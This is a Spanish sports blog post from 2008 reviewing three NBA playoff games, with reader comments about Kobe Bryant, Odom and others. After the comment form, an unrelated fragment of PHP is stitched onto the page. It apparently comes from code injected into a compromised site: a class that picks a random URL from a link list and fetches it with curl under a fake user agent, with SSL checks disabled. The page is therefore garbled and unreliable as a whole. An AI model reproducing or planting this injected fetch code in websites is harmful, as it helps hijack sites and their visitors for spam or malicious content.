Kobe, la mamba negra

24 de April de 2008 por txusma

by Txusma & TheDeerHunter

Kobe, la picadura de la Mamba Negra (DEN 107 – LAL 122)

Anoche, como la célebre serpiente referenciada en Kill Bill a la que tanto se gusta comparar, Kobe volvió a ser tan letal como pocos lo pueden ser. Lo asombroso de anoche no son ya sus 49 puntos, a los que ya nos tiene acostumbrados, sino que fue capaz de hacerlo prácticamente todo bien y en el momento adecuado, dominando individualmente (casi un 70% en una barbaridad de tiros) o buscando y encontrando a sus compañeros, sobre todo a Gasol, en el momento crítico (10 asistencias que bien pudieron ser alguna más). A algunos que ya le hemos visto hacer muchas de estas nos ha parecido uno de sus partidos más completos… y eso es decir mucho. Y es que, por ser Kobe, parece que lo que hace tiene que ser fácil, pero lo cierto es que al 24 todavía le quedan muchas cosas por demostrar a sus acérrimos detractores. Eso nunca es fácil ni siquiera para Kobe pero éste es un buen momento para hacerlo.

Del resto del equipo, bien Pau, sin alardes. Estuvo cuando se le necesitó y su mejor juego coincidió con la mejoría de su equipo pero no llegamos a tener claro si fue causa o consecuencia de ese hecho. No creo que se le deba pedir a Pau meter 40 puntos el mismo día que Kobe mete 50 aunque si se echó de menos algo más de tensión en algún rebote defensivo. Destaca también el terrible partido de Odom, jugador de mucho talento, pero también muy voluble y dependiente de lo emotivo. Anoche todo le salió mal y se hundió como ya ha ocurrido otras noches en el pasado. En esta ocasión esperamos que se haya tratado de un accidente, si no se come demasiado la cabeza con este partido. Por contra Walton hizo un trabajo extraordinario y ya llevaun par de partidos en buen estado de forma. Jugador similar a Odom en ciertos aspectos pero al mismo tiempo complementario, su juego es mucho más cerebral aunque menos físico. Si recupera su buen hacer de siempre se hará notar.

En Denver, Iverson y JR Smith cumplieron. Camby mejoró algo el nivel defensivo, en la línea de todo el equipo que dispuso una zonita que por momentos desconcertó a los Lakers. Carmelo, sin embargo, flojo.
Siguen siendo peligrosísimos y no resulta fácil para nadie defender sus eléctricas jugadas pero en cambio son inconsistentes por naturaleza, tanto en defensa como en ataque, incluso hasta el suicidio porque no se entienden determinadas actitudes en momentos decisivos. ¿Cómo te pueden pitar dos técnicas cuando te estás jugando el partido? Eso en playoffs te mata. Que le pase a JR tiene un pase pero a Iverson se le presupone un pelín más de cabeza que al resto (cómo será el resto).

Velando armas para el tercero (PHI 88 – DET 105)

Seguramente con la sensación del deber cumplido or su victoria en el primer partido Philadelphia saltó a la cancha de Auburn Hills completamente relajado lo que se tradujo en un 36 – 53 al descanso que finiquitó el partido. Espoleados por la sorprendente derrota anterior y por los ecos de las críticas, los jugadores de los Pistons rayaron todos a gran altura, comandados por un Rip Hamilton que se fue a los 20 puntos, 7 rebote sy 7 asistencias. Junto a él, Wallace y McDyess se hacían los dueños de la zona y Prince, además de aportar en ataque se exprimía en su defensa sobre Iguodala al que secó completamente (4 puntos, 1 de 9 en tiros).

Philadelphia no era capaz de capear el temporal. Con su principal baluarte ofensivo totalmente fuera del partido, con Dalembert superado una y otra vez y con Andre Miller mucho más vigilado que en el primer partido, sus oportunidades fueron nulas en todo momento. Así que en la segunda parte los 2 equipos dieron descanso a sus teóricos titulares y se dedicaron a velar armas para el tercer encuentro que se antoja fundamental. Si Philadelphia es capaz de volver a Detroit con un 2-2 estará ya por encima de las posibilidades que le daban todos las apuestas y con la moral intacta, este equipo es capaz de todo. Hay eliminatoria.

No hay color y si lo hay es verde (ATL 77 – BOS 96)

No debe ser fácil salir a la cancha sabiendo que no hay ninguna posibilidad de victoria. El caso de los partidos Atlanta – Boston recuerdan a los Harlem Globetrotters – New York Nationals, en que el equipo de la Gran Manzana salta al campo con la certeza que es tan solo un invitado obligado a la fiesta de los jugadores tricolores, por el simple hecho de que el baloncesto es un deporte donde se enfrentan 2 equipos. En el partido de ayer no hubo ruedas, ni sacaron al público a la cancha, ni el árbitro bailó Break-Dance y si hay que ser sincero no fue un paseo militar para los verdes, pero el resultado está ahí. La defensa de los Celtics, contagiada por su flamante Mejor Jugador Defensivo de la Temporada, asfixió el caudal ofensivo de los Hawks una y otra vez, poco a poco, mientras que en el otro lado de la cancha los puntos iban cayendo también sin prisa pero sin pausa. De esta manera la diferencia iba creciendo lenta pero inexorablemente hasta los 19 puntos finales.

Mención aparte merecen los bases titulares de ambos equipos. Por un lado Rajon Rondo, grandísimo defensor y buen penetrador. Se ha adaptado perfectamente al nuevo estilo de juego del Big Three y su papel está siendo mucho más fundamental de lo que se esperaba a principio de temporada. Ahora Sam Cassell, todo veteranía, le guarda las espaldas y eso da un plus de tranquilidad. Enfrente, el otrora gran jugador, Mike Bibby. Bibby empezó a desvanecerse cuando Webber y Stojakovic dejaron los Kings y ahora ya no es ni la sombra de lo que fue. Tal vez el año que viene, involucrado desde el principio, en el ilusionante proyecto de los Hawks vuelva a recuperar su estado de forma y podamos ver al base de antaño, pero en esta eliminatoria ya no se le espera.

Comenta

7 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Creo k algun partidete ganaran en colorado los locales, esas 2 tecnicas fueron cruciales para el desenlace del partido.

      Citar

  2. Viva_Dirk dice:
    #2

    Odom estuvo muy marcado por las faltas, un par de ellas ridículas. No me preocupa en absoluto su partido de ayer.

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    Vaya decepción,,ni la mínima reseña del gran Ira Newble.

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    Yo creo que ése también es Odom. Dicho lo cual, normal, en la universidad, no recibió la suficiente formación académica para aprobar dos examenes seguidos.

      Citar

  5. TheDeerHunter dice:
    #5

    A mí tampoco me preocupa el partido de ayer de Odom…

    Lo de las faltas ridículas… sí lo fueron, pero el ridículo fue él al hacerlas (la 5ª fue para ostiarlo vivo)

      Citar

  6. TheDeerHunter dice:
    #6

    Ira Newble está agazapado, esperando su momento para meter la canasta ganadora en algún partido vital.

      Citar

  7. Gallis dice:
    #7

    A mi lo de Odom tampoco me preocupa…porque ya tengo asumido que Odom es así. Es capaz de alternar lo del primer partido con esto del segundo. Lo bueno es que desde la llegada de Pau, lo primero es un poco más habitual que lo segundo, jeje…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>